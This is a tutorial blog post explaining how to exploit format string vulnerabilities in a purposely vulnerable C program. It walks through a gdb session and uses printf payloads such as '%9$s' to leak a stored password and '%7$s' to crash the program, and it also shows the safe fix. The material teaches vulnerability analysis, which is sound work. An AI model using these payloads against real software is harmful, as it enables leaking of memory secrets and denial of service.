How to exploit format string vulnerabilities

September 21, 2020 by Srinivas

In the previous articles, we discussed printing functions, format strings and format string vulnerabilities. This article provides an overview of how format string vulnerabilities can be exploited.

In this article, we begin by solving a simple challenge: leaking a secret from memory. In the next article, we will discuss another example, in which we chain a format string vulnerability with a buffer overflow vulnerability for greater impact.

How can format string vulnerabilities be exploited?

As mentioned in the previous article, the following are some of the attacks possible using format string vulnerabilities.

  • Leaking secrets
  • Denial of Service
  • Leaking memory addresses
  • Overwriting memory addresses 

This article covers the first two items: leaking secrets and denial of service.

Leaking secrets from stack

The following vulnerable program shows how a simple format string vulnerability can be exploited to read data from memory.

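#include <stdio.h>

int main(int argc, char *argv[]){

    /* Local pointer to the secret; the pointer itself is stored on the stack. */
    char *secret = "p@ssw0rD";

    /* Vulnerable: user input is used directly as the format string. */
    printf(argv[1]);

}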

As we can notice, the program has a format string vulnerability because printf receives user input and uses it directly as the format string. The call has no fixed format string such as "%s" of its own, so any format specifiers in the user input are interpreted by printf.
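For contrast, the usual remedy is to keep the format string constant and pass user input only as an argument. The following is a minimal sketch and not part of the original program: the helper name render_untrusted is hypothetical, and it writes into a buffer with snprintf so that the result can be inspected.

```c
#include <stdio.h>
#include <stddef.h>

/*
 * Hypothetical helper (not from the original program): copies untrusted
 * input into out using a constant "%s" format, so any conversion
 * specifiers inside the input are treated as plain text.
 * Returns the value of snprintf: the length the full output would need.
 */
int render_untrusted(char *out, size_t cap, const char *input)
{
    return snprintf(out, cap, "%s", input);
}
```

With this approach, input such as %9$s ends up in the buffer as literal text instead of causing a read from the stack. In the vulnerable program, the equivalent change would be printf("%s", argv[1]).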

Let us run the program in gdb, disassemble the main function and set a breakpoint at the address of the call to printf. The gef➤ prompt in the excerpt comes from the GEF extension for gdb.

$ gdb ./vulnerable

gef➤  disass main
Dump of assembler code for function main:
   0x0000000000401136 <+0>: endbr64
   0x000000000040113a <+4>: push   rbp
   0x000000000040113b <+5>: mov    rbp,rsp
   0x000000000040113e <+8>: sub    rsp,0x20
   0x0000000000401142 <+12>: mov    DWORD PTR [rbp-0x14],edi
   0x0000000000401145 <+15>: mov    QWORD PTR [rbp-0x20],rsi
   0x0000000000401149 <+19>: lea    rax,[rip+0xeb4]        # 0x402004
   0x0000000000401150 <+26>: mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401154 <+30>: mov    rax,QWORD PTR [rbp-0x20]
   0x0000000000401158 <+34>: add    rax,0x8
   0x000000000040115c <+38>: mov    rax,QWORD PTR [rax]
   0x000000000040115f <+41>: mov    rdi,rax
   0x0000000000401162 <+44>: mov    eax,0x0
   0x0000000000401167 <+49>: call   0x401040 <printf@plt>
   0x000000000040116c <+54>: mov    eax,0x0
   0x0000000000401171 <+59>: leave
   0x0000000000401172 <+60>: ret
End of assembler dump.

gef➤  b *0x0000000000401167
gef➤  run

In the preceding excerpt, we set the breakpoint and started the program, so execution should stop at the breakpoint.

When the breakpoint is hit, the program is about to call printf. If we examine the stack at this point, we should see the address of the string p@ssw0rD, as shown below.

STACK:

0x00007fffffffdf40│+0x0000: 0x00007fffffffe058  →  0x00007fffffffe380
0x00007fffffffdf48│+0x0008: 0x0000000100401050
0x00007fffffffdf50│+0x0010: 0x00007fffffffe050  →  0x0000000000000001
0x00007fffffffdf58│+0x0018: 0x0000000000402004  →  "p@ssw0rD"
0x00007fffffffdf60│+0x0020: 0x0000000000000000 ← $rbp
0x00007fffffffdf68│+0x0028: 0x00007ffff7ded0b3  →  <__libc_start_main+243> mov edi, eax
0x00007fffffffdf70│+0x0030: 0x00007ffff7ffc620  →  0x0005043700000000
0x00007fffffffdf78│+0x0038: 0x00007fffffffe058  →  0x00007fffffffe380  →

As we can see in the preceding excerpt, the stack slot at offset 0x18 holds the address 0x0000000000402004, which points to the string "p@ssw0rD". This slot is the local variable secret, which the disassembly stores at rbp-0x8.

Our objective is to leak this string using the format string vulnerability in the program.

Let us pass several %llx specifiers, separated by colons, as user input. %llx prints an unsigned long long value in hexadecimal, which lets us see full 64-bit values on this 64-bit system.

The output looks as follows.

$ ./vulnerable %llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx
7ffca4114f28:7ffca4114f40:401180:0:7f4e3060bd50:7ffca4114f28:200401050:7ffca4114f20:402004:0:7f4e3041c0b3:7f4e30627620:7ffca4114f28:200000000:401136:401180:36f0efdaa04eb405:401050:7ffca4114f20:0:0:c909a7f83cceb405:c86c8f592080b405:0:0

As we can notice in the preceding output, the address 402004 is leaked. This is the same address we saw on the stack earlier, which means we can leak the address of the string p@ssw0rD.
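Typing a long run of %llx specifiers by hand is error-prone, so the argument can also be generated. The following is a minimal sketch under stated assumptions: the helper name build_leak_payload is hypothetical, and the caller is assumed to supply a buffer large enough for the requested number of specifiers.

```c
#include <stdio.h>
#include <stddef.h>

/*
 * Hypothetical helper: writes count copies of "%llx" separated by ':'
 * into out. Returns 0 on success, -1 if count is not positive or the
 * buffer is too small.
 */
int build_leak_payload(char *out, size_t cap, int count)
{
    size_t used = 0;

    if (count <= 0 || cap == 0)
        return -1;

    for (int i = 0; i < count; i++) {
        /* The text is passed as an argument, never as the format itself. */
        int n = snprintf(out + used, cap - used, "%s%s",
                         i == 0 ? "" : ":", "%llx");
        if (n < 0 || (size_t)n >= cap - used)
            return -1;
        used += (size_t)n;
    }
    return 0;
}
```

Calling build_leak_payload(buf, sizeof buf, 25) would produce the same 25-specifier argument used in the command above, which can then be printed and passed to the target program.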

We specified many %llx specifiers to reach the address, but the other values dumped from the stack are of no use to us. We can print only the value we want by using Direct Parameter Access, which selects an argument by its position. In this case, the address is the 9th value printed, so %9$llx accesses it directly. The argument is enclosed in single quotes so that the shell does not expand $llx as a variable. This looks as follows.

$ ./vulnerable '%9$llx'
402004
$
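The position can also be worked out from the stack view instead of counting output fields. The sketch below assumes the x86-64 System V calling convention and a printf call that receives only the format string, as in the disassembly shown earlier. The helper name stack_offset_to_param_index is hypothetical.

```c
#include <stddef.h>

/*
 * Assumption: x86-64 System V calling convention, and printf called with
 * only the format string. The format itself travels in rdi, so variadic
 * arguments 1 to 5 are read from rsi, rdx, rcx, r8 and r9, and argument 6
 * is the 8-byte slot at the caller's rsp at the time of the call.
 *
 * Hypothetical helper: converts a byte offset from rsp (as shown in the
 * debugger's stack view) into the index to use in "%<index>$llx".
 */
unsigned stack_offset_to_param_index(size_t offset_from_rsp)
{
    const unsigned register_args = 5;   /* rsi, rdx, rcx, r8, r9 */
    const size_t slot_size = 8;         /* one 64-bit stack slot */

    return register_args + (unsigned)(offset_from_rsp / slot_size) + 1;
}
```

The pointer to the secret sits at offset 0x18 in the stack view, and the helper returns 9 for that offset, which agrees with the position found by counting the leaked values.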

As we can notice, we managed to leak just the address that we wanted. However, we have leaked the address and not the string itself. To leak the actual string, we can use %9$s instead. This tells printf to treat the 9th value as a pointer and print the string it points to. This looks as follows.

$ ./vulnerable '%9$s'
p@ssw0rD
$
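The difference between the two specifiers can be reproduced safely with a fixed format string and explicit arguments. This is an illustrative sketch only: the function name show_value_and_target is hypothetical, and positional %n$ specifiers are a POSIX extension (supported by glibc) rather than part of ISO C.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/*
 * Hypothetical demo: formats one pointer in two ways. The first argument
 * is the pointer's numeric value (what %llx shows); the second is the
 * pointer itself, which %s dereferences to print the string it points to.
 */
int show_value_and_target(char *out, size_t cap, const char *ptr)
{
    return snprintf(out, cap, "%1$llx -> %2$s",
                    (unsigned long long)(uintptr_t)ptr, ptr);
}
```

Passing a pointer to "p@ssw0rD" yields the pointer's hexadecimal value followed by the string itself. The exact address depends on where the string is placed in memory for a given build and run.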

We managed to successfully leak the secret string from the stack by using a format string vulnerability in the target binary. 

Crashing the program

In the previous section, we used %9$s as our format specifier and dumped the secret string from the stack. This technique worked because the 9th value is a valid address that points to our secret string.

If we try to read from an invalid memory location in the same way, the program receives a segmentation fault and crashes. The following excerpt shows that using %s on the 7th position causes a segmentation fault, since the value there is not a valid address.

$ ./vulnerable '%7$s'
Segmentation fault (core dumped)
$

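The crash occurred because the value at the 7th position is not a valid address. Such a value could be an address in kernel space, or a non-address value such as a simple integer or character. In the earlier %llx output, for example, the 7th value was 200401050, which is not a pointer to readable memory.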
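One way to see why the 7th value is not a usable pointer is to split it into 32-bit halves. In the disassembly, argc is stored as a 4-byte value at rbp-0x14, which is the upper half of the 8-byte slot at rbp-0x18, the second slot from rsp. The sketch below assumes a little-endian x86-64 target, and the names slot_halves and split_slot are hypothetical.

```c
#include <stdint.h>

/*
 * Hypothetical helper: splits one 64-bit stack slot into its two 32-bit
 * halves. On little-endian x86-64, the half stored at the higher address
 * (here argc at rbp-0x14) becomes the upper 32 bits of the slot value.
 */
struct slot_halves {
    uint32_t high;  /* bytes at slot+4 .. slot+7 */
    uint32_t low;   /* bytes at slot+0 .. slot+3 */
};

struct slot_halves split_slot(uint64_t value)
{
    struct slot_halves h;
    h.high = (uint32_t)(value >> 32);
    h.low  = (uint32_t)(value & 0xffffffffu);
    return h;
}
```

For the leaked value 0x200401050, the upper half is 2, which matches argc when the program is run with one argument, and the lower half is 0x401050, which appears to be leftover data in the unused part of the slot. Taken together as a 64-bit number, this is a packed integer and not an address, so dereferencing it with %s fails.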

These two examples clearly show how format string vulnerabilities can be used to leak memory and crash the program.

Conclusion

Format string vulnerabilities can cause serious damage when exploited. As shown above, an attacker can read data from memory and even crash the application. The impact can be greater when these vulnerabilities are chained with others, such as buffer overflows. In the next article, we will discuss how format string vulnerabilities and buffer overflows can be chained to bypass memory protections such as stack canaries.

Srinivas

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds the Offensive Security Certified Professional (OSCP) certification. He blogs at www.androidpentesting.com. Email: srini0x00@gmail.com